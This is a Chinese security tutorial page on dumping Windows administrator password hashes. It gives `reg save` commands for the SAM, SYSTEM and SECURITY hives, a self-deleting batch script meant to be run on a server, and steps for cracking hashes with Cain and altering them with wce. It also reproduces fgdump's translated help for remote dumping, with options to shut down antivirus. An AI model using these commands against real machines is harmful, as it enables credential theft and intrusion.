• linkedu视频
  • 平面设计
  • 电脑入门
  • 操作系统
  • 办公应用
  • 电脑硬件
  • 动画设计
  • 3D设计
  • 网页设计
  • CAD设计
  • 影音处理
  • 数据库
  • 程序设计
  • 认证考试
  • 信息管理
  • 信息安全
菜单
linkedu.com
  • 网页制作
  • 数据库
  • 程序设计
  • 操作系统
  • CMS教程
  • 游戏攻略
  • 脚本语言
  • 平面设计
  • 软件教程
  • 网络安全
  • 电脑知识
  • 服务器
  • 视频教程
  • 安全教程
  • 安全设置
  • 杀毒防毒
  • 病毒查杀
  • 脚本攻防
  • 入侵防御
  • 工具使用
  • 业界动态
  • Exploit
  • 漏洞分析
  • 加密解密
  • 手机安全
  • 区块链
您的位置:首页 > 网络安全 >安全教程 > 抓取管理员hash值(哈希)的另类方法

抓取管理员hash值(哈希)的另类方法

作者:佚名 字体:[增加 减小] 来源:互联网

佚名 向大家分享了抓取管理员hash值(哈希)的另类方法,其中包含hash哈希值,hash算法哈希碰撞,哈希码 torrent hash,hash哈希,哈希值等知识点,遇到此问题的同学们可以参考下
今天抓hash的时候发现GetHashes.exe不好使..另外又测试了几个也都不好用...
不同版本的Windows的hash获取方法不一样. 用到的工具有pwdump7.exe、GetHashes.exe、SAMInside.exe、LC5、Cain、Proactive Password Auditor、Ophcrack.</div>  于是百度了一些资料穿上来!希望大家能学习一下。</div>  ====================================第1种===========================================</div>  使用工具 cain、cmd、wce1.2等</div>  首先使用通用方法抓取HASH</div>  使用命令先保存一份需要的信息。</div>  reg save hklm\sam sam.hive</div>  reg save hklm\system system.hive</div>  reg save hklm\security security.hive</div>  (这三个文件我找了个批处理,这样比较方便)</div>  ==========================</div>  @echo off</div> reg save hklm\sam sam.hive</div> reg save hklm\system system.hive</div> reg save hklm\security security.hive</div> del %0</div>  ===========================</div>  保存为批处理文件,直接在服务器上运行。</div>  就会在批处理所在目录生成这三个文件</div>  和下面的效果一样,只不过简化了步骤</div> </div> 然后我们使用CAIN打开保存到的system.hive 和security.hive两个文件。我是在虚拟机里面操作就直接在虚拟机里面搞了。。大家在服务器上搞可以下载到本地。</div>  打开CAIN选择LSA Secrets然后打开system.hive 和security.hive两个文件</div> </div> 加载后我们可以看到一些信息,这些信息可能会有明文密码,我这里是没有的。</div> </div> 如果没有我们就需要抓HASH了。点击CAIN的Cracker选项卡,加载sam.hive文件。</div> </div> </div> 拿到HASH了,www.jb51.net 下面就是破解,用工具自带的破解试试密码出来了,我设置的123456</div> </div> 我们也可以使用彩虹表来破解</div> 下面我们使用wce来搞。。这个工具是渗透利器哈~~具体介绍大家自己百度去。</div> </div> 从帮助来看我们可以使用-l参数查看NTML hash</div>  我们还可以用-s参数来改HASH值如图</div> </div> 从图中我们可以看到最后一位的HASH我从4修改到了5</div> </div> ====================================第2种===========================================</div> fgdump 可以远程抓Hash的工具</div>  作者:TheLostMind</div> 一直都是本地抓,今天上SamInside论坛看到一个开源的工具,fgdump,可以远程抓。</div>  http://swamp.foofus.net/fizzgig/fgdump/fgdump-usage.htm</div>  fgDump 2.1.0 - fizzgig and the mighty group at foofus.net</div> Written to make j0m0kun's life just a bit easier</div> Copyright(C) 2008 fizzgig and foofus.net</div> fgdump comes with ABSOLUTELY NO WARRANTY!</div> This is free software, and you are welcome to redistribute it</div> under certain conditions; see the COPYING and README files for</div> more information.</div> Usage:</div> fgdump [-?][-t][-c][-w][-s][-r][-v][-k][-o][-a][-O 32|64][-l logfile][-T threads] [{{-h Host | -f filename} -u Username -p Password | -H filename}]</div> where Username and Password have administrator credentials</div> -? displays help (you're looking at it!)</div> -t will test for the presence of antivirus without actually running the password dumps</div> -c skips the cache dump</div> -w skips the password dump</div> -s performs the protected storage dump</div> -r forgets about existing pwdump/cachedump files. The default behavior is to skip a host if these files already exist.</div> -v makes output more verbose. Use twice for greater effect</div> -k keeps the pwdump/cachedump going even if antivirus is in an unknown state</div> -l logs all output to logfile</div> -T runs fgdump with the specified number of parallel threads</div> -h is the name of the single host to perform the dumps against</div> -f reads hosts from a line-separated file</div> -H reads host:username:password from a line-separated file (per-host credentials)</div> -o skips pwdump history dumps</div> -a will not attempt to detect or shut down antivirus, even if it is present</div>  -O manually sets whether the target is a 32- or 64-bit OS. Note that this applies to all hosts specified.</div> ** As of version 1.4.0, you can run fgdump with no parameters to dump the local box (no impersonation or binding)</div> 测试了一下,很不错,简单翻译了一下帮助。</div>  用法:</div> fgdump [-?][-t][-c][-w][-s][-r][-v][-k][-o][-a][-O 32|64][-l logfile][-T threads] [{{-h Host | -f filename} -u</div>  Username -p Password | -H filename}]</div>  用户名和密码要求要有管理员资格</div>  -? 显示帮助</div> -t 测试当前的杀毒软件,并不是真正的转储密码</div> -c 跳过缓存转储</div> -w 跳过密码转储</div> -s 执行保护存贮转储</div> -r 忽略现存的pwdump/cachedump文件。默认的行为是跳过存在这些文件的主机。</div> -v 详细输出. 使用两次能获得更为详细的输出</div> -k 即使不知道杀毒软件的状态也继续执行pwdump/cachedump(进行密码转储)</div> -l 记录所有输出到日志文件</div> -T 使用指定数量的线程执行此程序</div> -h 需要执行密码转储的单个目标主机</div> -f 从用行分隔的文件中读取主机列表</div> -H 从用行分隔的文件中读取 主机名:用户名:密码</div> -o 跳过转储历史密码</div> -a 试图检测或关闭杀毒软件,即使杀毒软件正在运行</div>  -O 手工设置远程主机是32位操作系统还是64位操作系统。 注意:这项操作应用到所有指定的主机。</div>  ** 使用1.4.0,你可以直接运行此程序,不需要带参数,来转储本机密码</div> </div> </div> </div> </div> </div> </div> </div> </div> </div>

您可能想查找下面的文章:

  • 抓取管理员hash值(哈希)的另类方法

相关文章

  • 如何判断电脑是否沦为“肉鸡”?
  • 网页挂马方法和技巧大汇总
  • 黑客技术入门 十个常用破解网络密码的方法
  • 几招帮你识别和防御Web网页木马
  • 菜鸟玩注入之找后台篇
  • pstools使用方法
  • 反弹技术角度对DDOS攻击进行分析
  • 如何有效的抵抗DDOS的方法介绍
  • Android平台的SQL注入漏洞浅析(一条短信控制你的手机)
  • 突破一流拦截 上传限制的方法

文章分类

  • 安全教程
  • 安全设置
  • 杀毒防毒
  • 病毒查杀
  • 脚本攻防
  • 入侵防御
  • 工具使用
  • 业界动态
  • Exploit
  • 漏洞分析
  • 加密解密
  • 手机安全
  • 区块链

最近更新的内容

    • 公开个Nday(图)
    • 社会工程学入侵三步走
    • ARP欺骗原理以及路由器的先天免疫
    • 黑客技术入门 十个常用破解网络密码的方法
    • 中小网站如何对付拒绝服务攻击
    • 服务器如何有效防止DDoS攻击?
    • SqlMap用户手册
    • 怎么利用硬件防御ROP 详解HA-CFI技术
    • 网页挂马方法和技巧大汇总
    • 利用php+socket5代理进行内网渗透测试

关于我们 - 联系我们 - 免责声明 - 网站地图

©2020-2025 All Rights Reserved. linkedu.com 版权所有